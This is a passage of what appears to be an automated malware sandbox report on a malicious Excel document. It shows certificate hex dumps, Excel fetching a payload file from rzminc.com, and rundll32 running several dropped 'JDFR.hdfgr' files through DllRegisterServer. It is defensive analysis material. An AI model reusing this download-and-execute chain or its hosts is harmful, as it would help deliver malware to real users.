                                                                                                                                                    Data Raw: 30 82 06 13 30 82 03 fb a0 03 02 01 02 02 10 7d 5b 51 26 b4 76 ba 11 db 74 16 0b bc 53 0d a7 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0c 05 00 30 81 88 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 4e 65 77 20 4a 65 72 73 65 79 31 14 30 12 06 03 55 04 07 13 0b 4a 65 72 73 65 79 20 43 69 74 79 31 1e 30 1c 06 03 55 04 0a 13 15 54 68 65 20 55 53 45 52 54 52 55 53 54 20 4e 65 74 77 6f 72 6b 31 2e 30 2c 06 03 55 04 03 13 25 55 53 45 52 54 72 75 73 74 20 52 53 41 20 43 65 72 74 69 66 69 63 61 74 69 6f 6e 20 41 75 74 68 6f 72 69 74 79 30 1e 17 0d 31 38 31 31 30 32 30 30 30 30 30 30 5a 17 0d 33 30 31 32 33 31 32 33 35 39 35 39 5a 30 81 8f 31 0b 30 09 06 03 55 04 06 13 02 47 42 31 1b 30 19 06 03 55 04 08 13 12 47 72 65 61 74 65 72 20 4d 61 6e 63 68 65 73 74 65 72 31 10 30 0e 06 03 55 04 07 13 07 53 61 6c 66 6f 72 64 31 18 30 16 06 03 55 04 0a 13 0f 53 65 63 74 69 67 6f 20 4c 69 6d 69 74 65 64 31 37 30 35 06 03 55 04 03 13 2e 53 65 63 74 69 67 6f 20 52 53 41 20 44 6f 6d 61 69 6e 20 56 61 6c 69 64 61 74 69 6f 6e 20 53 65 63 75 72 65 20 53 65 72 76 65 72 20 43 41 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 d6 73 33 d6 d7 3c 20 d0 00 d2 17 45 b8 d6 3e 07 a2 3f c7 41 ee 32 30 c9 b0 6c fd f4 9f cb 12 98 0f 2d 3f 8d 4d 01 0c 82 0f 17 7f 62 2e e9 b8 48 79 fb 16 83 4e ad d7 32 25 93 b7 07 bf b9 50 3f a9 4c c3 40 2a e9 39 ff d9 81 ca 1f 16 32 41 da 80 26 b9 23 7a 87 20 1e e3 ff 20 9a 3c 95 44 6f 87 75 06 90 40 b4 32 93 16 09 10 08 23 3e d2 dd 87 0f 6f 5d 51 14 6a 0a 69 c5 4f 01 72 69 cf d3 93 4c 6d 04 a0 a3 1b 82 7e b1 9a b9 ed c5 9e c5 37 78 9f 9a 08 34 fb 56 2e 58 c4 09 0e 06 64 5b bc 37 dc f1 9f 28 68 a8 56 b0 92 a3 5c 9f bb 88 98 08 1b 24 1d ab 30 85 ae af b0 2e 9e 7a 9d c1 c0 42 1c e2 02 f0 ea e0 4a d2 ef 90 0e b4 c1 40 16 f0 6f 85 42 4a 64 f7 a4 30 a0 fe bf 2e a3 27 5a 8e 8b 58 b8 ad c3 19 17 84 63 ed 6f 56 fd 83 cb 60 34 c4 74 be e6 9d db e1 e4 e5 ca 0c 5f 15 02 03 01 00 01 a3 82 01 6e 30 82 01 6a 30 1f 06 03 55 1d 23 04 18 30 16 80 14 53 79 bf 5a aa 2b 4a cf 54 80 e1 d8 9b c0 9d f2 b2 03 66 cb 30 1d 06 03 55 1d 0e 04 16 04 14 8d 8c 5e c4 54 ad 8a e1 77 e9 9b f9 9b 05 e1 b8 01 8d 61 e1 30 0e 06 03 55 1d 0f 01 01 ff 04 04 03 02 01 86 30 12 06 03 55 1d 13 01 01 ff 04 08 30 06 01 01 ff 02 01 00 30 1d 06 03 55 1d 25 04 16 30 14 06 08 2b 06 01 05 05 07 03 01 06 08 2b 06 01 05 05 07 03 02 30 1b 06 03 55 1d 20 04 14 30 12 30 06 06 04 55 1d 20 00 30 08 06 06 67 81 0c 01 02 01 30 50 06 03 55 1d 1f 04 49 30 47 30 45 a0 43 a0 41 86 3f 68 74 74 70 3a 2f 2f 63 72 6c 2e 75 73 65 72 74 72 75 73 74 2e 63 6f 6d 2f 55 53 45 52 54 72 75 73 74 52 53 41 43 65 72 74 69 66 69 63 61 74 69 6f 6e 41 75 74 68 6f 72 69 74 79 2e 63 72 6c 30 76 06 08 2b 06 01 05 05 07 01 01 04 6a 30 68 30 3f 06 08 2b 06 01 05 05 07 30 02 86 33 68 74 74 70 3a 2f 2f 63 72 74 2e 75 73 65 72 74 72 75 73 74 2e 63 6f 6d 2f
                                                                                                                                                    Data Ascii: 00}[Q&vtS0*H010UUS10UNew Jersey10UJersey City10UThe USERTRUST Network1.0,U%USERTrust RSA Certification Authority0181102000000Z301231235959Z010UGB10UGreater Manchester10USalford10USectigo Limited1705U.Sectigo RSA Domain Validation Secure Server CA0"0*H0s3< E>?A20l-?Mb.HyN2%P?L@*92A&#z <Dou@2#>o]QjiOriLm~7x4V.Xd[7(hV\$0.zBJ@oBJd0.'ZXcoV`4t_n0j0U#0SyZ+JTf0U^Twa0U0U00U%0++0U 00U 0g0PUI0G0ECA?http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0v+j0h0?+03http://crt.usertrust.com/
                                                                                                                                                    Feb 23, 2021 15:59:57.904149055 CET1125INData Raw: 55 53 45 52 54 72 75 73 74 52 53 41 41 64 64 54 72 75 73 74 43 41 2e 63 72 74 30 25 06 08 2b 06 01 05 05 07 30 01 86 19 68 74 74 70 3a 2f 2f 6f 63 73 70 2e 75 73 65 72 74 72 75 73 74 2e 63 6f 6d 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0c 05 00 03 82
                                                                                                                                                    Data Ascii: USERTrustRSAAddTrustCA.crt0%+0http://ocsp.usertrust.com0*H2aHOGMxopR13WR1kT@h|U69QF~I*6h9zNVo{;w8_~FHh4g8f^(:@'rN)!<|,1D


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    4192.168.2.34972972.52.227.18080C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Feb 23, 2021 16:00:04.973792076 CET1204OUTGET /fdzgprclatqo/44250666589120400000.dat HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                    Host: rzminc.com
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Feb 23, 2021 16:00:05.439776897 CET1232INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 23 Feb 2021 15:00:05 GMT
                                                                                                                                                    Server: Apache/2.4.46 (CentOS)
                                                                                                                                                    X-Powered-By: PHP/7.3.27
                                                                                                                                                    Upgrade: h2
                                                                                                                                                    Connection: keep-alive, close
                                                                                                                                                    Cache-Control: private, must-revalidate
                                                                                                                                                    Expires: Tue, 23 Feb 2021 15:00:05 GMT
                                                                                                                                                    Content-Length: 0
                                                                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                                                                    HTTPS Packets

                                                                                                                                                    TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                    Feb 23, 2021 15:59:57.592655897 CET138.36.237.100443192.168.2.349722CN=jugueterialatorre.com.ar CN=RapidSSL RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=USCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Jun 02 02:00:00 CEST 2020 Mon Nov 06 13:23:33 CET 2017Thu Jun 03 01:59:59 CEST 2021 Sat Nov 06 13:23:33 CET 2027771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                    CN=RapidSSL RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USMon Nov 06 13:23:33 CET 2017Sat Nov 06 13:23:33 CET 2027

                                                                                                                                                    Code Manipulations

                                                                                                                                                    Statistics

                                                                                                                                                    CPU Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Memory Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                    Behavior

                                                                                                                                                    Click to jump to process

                                                                                                                                                    System Behavior

                                                                                                                                                    General

                                                                                                                                                    Start time:15:59:46
                                                                                                                                                    Start date:23/02/2021
                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                    Imagebase:0x160000
                                                                                                                                                    File size:27110184 bytes
                                                                                                                                                    MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:16:00:05
                                                                                                                                                    Start date:23/02/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:rundll32 ..\JDFR.hdfgr,DllRegisterServer
                                                                                                                                                    Imagebase:0xf0000
                                                                                                                                                    File size:61952 bytes
                                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:16:00:05
                                                                                                                                                    Start date:23/02/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:rundll32 ..\JDFR.hdfgr1,DllRegisterServer
                                                                                                                                                    Imagebase:0xf0000
                                                                                                                                                    File size:61952 bytes
                                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:16:00:06
                                                                                                                                                    Start date:23/02/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:rundll32 ..\JDFR.hdfgr2,DllRegisterServer
                                                                                                                                                    Imagebase:0xf0000
                                                                                                                                                    File size:61952 bytes
                                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:16:00:07
                                                                                                                                                    Start date:23/02/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:rundll32 ..\JDFR.hdfgr3,DllRegisterServer
                                                                                                                                                    Imagebase:0xf0000
                                                                                                                                                    File size:61952 bytes
                                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:16:00:07
                                                                                                                                                    Start date:23/02/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:rundll32 ..\JDFR.hdfgr4,DllRegisterServer
                                                                                                                                                    Imagebase:0xf0000
                                                                                                                                                    File size:61952 bytes
                                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Disassembly

                                                                                                                                                    Code Analysis

                                                                                                                                                    Reset < >